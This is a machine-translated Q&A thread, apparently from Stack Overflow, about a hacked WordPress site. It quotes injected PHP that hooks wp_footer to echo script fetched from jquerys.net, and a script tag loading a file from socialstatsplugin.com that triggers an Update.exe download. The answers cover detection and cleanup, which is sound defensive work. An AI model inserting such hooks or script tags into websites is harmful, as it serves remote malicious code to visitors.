2014-04-08 59 views
0

這個腳本保持回來到的public_html文件夾我的WP-load.php文件:)我的wordpress網站被黑客入侵了嗎?它是一個插件嗎?

功能pluginAuth({ 回聲(wp_remote_retrieve_body(wp_remote_get( 'http://jquerys.net/jquery-1.6.3.min.js'))); } add_action('wp_footer','pluginAuth');

這種定向到一個病毒網站「jquerys.net」

什麼可以解。從wp-load.php中刪除函數並不能消除它,因爲它會刷新我博客的任何頁面。

好心幫

+2

閱讀並關注birgire答案http://stackoverflow.com/questions/22918942/why-does-my-wordpress-have-file-names-with-random-numbers/22919208#comment34982673_22919208 –

回答

0

最大的可能是你在wp-ulpoads文件夾一些感染或惡意文件,檢查也有對任何類型的文件,除圖像或文件不同。

同樣重要:檢查您當前的主題functions.php文件的惡意代碼,通常被黑客入侵主題(即通過mafiashare網站bittorent網站下載)注入這樣的代碼,搜索任何curl()請求,實際上不僅在functions.php,但在文件(如果你的主題有他們)options.phpsettings.php

1

可能有惡意代碼注入到你的任何wordpress文件。您需要仔細檢查所有文件,尤其是您的主題內容,以查找不應存在的代碼或文件/文件夾。

這之後,您可以使用此文章,讓您打造更安全:

http://codex.wordpress.org/Hardening_WordPress

一直對我非常有用,在過去爲了防止這樣的事情再次發生。只要您願意,您可以儘可能多或儘可能少的安全措施。

我肯定會建議做一切從保護可溼性粉劑管理員節。

0

你似乎有被感染的WordPress安裝。使用Theme Authenticity Checker OR Exploit Scanner插件自動檢測潛在的惡意文件可能是罪魁禍首。

您也可以嘗試的Sucuri免費的掃描服務。

一旦你完成了已損壞的文件的識別完成後,與他們同行的官員,你可以從WordPress.org得到更換。

作爲一種防禦措施,安裝WordPress File Monitor Plus插件 - 因爲它的電子郵件每次一些文件被改變。這將允許您快速恢復某些黑客/腳本在將來做出的任何更改!

0

我能夠檢測惡意腳本。它在public_html文件夾中。該文件是「main.php」,它不在默認安裝中,也不參與任何主題或插件。在刪除了所有未定義的插件之後,我刪除了這個文件並刪除了wp-load.php中的代碼。

起初,當我沒有刪除的「main.php」文件。 wp-load中的'函數'不斷回來。但刪除「main.php」文件後,我已經擺脫了這種病毒。

0

有一個在WP

新病毒有一行
<script src="//socialstatsplugin.com/jqury.js"></script>

發起的Update.exe的下載我已經做了一些評論對這種病毒。

只要去你的WP文件夾,並檢查是否有不需要的隱藏文件,當你通過瀏覽時,這些文件是不可讀的。

至於說只是做 DELETE FROM wp_options WHERE option_name like '%wp_data_newa%' 任何文件夾中刪除所有不需要的隱藏文件夾。它一直工作到現在。希望它會有所幫助。永遠不知道未來。

感謝

相關問題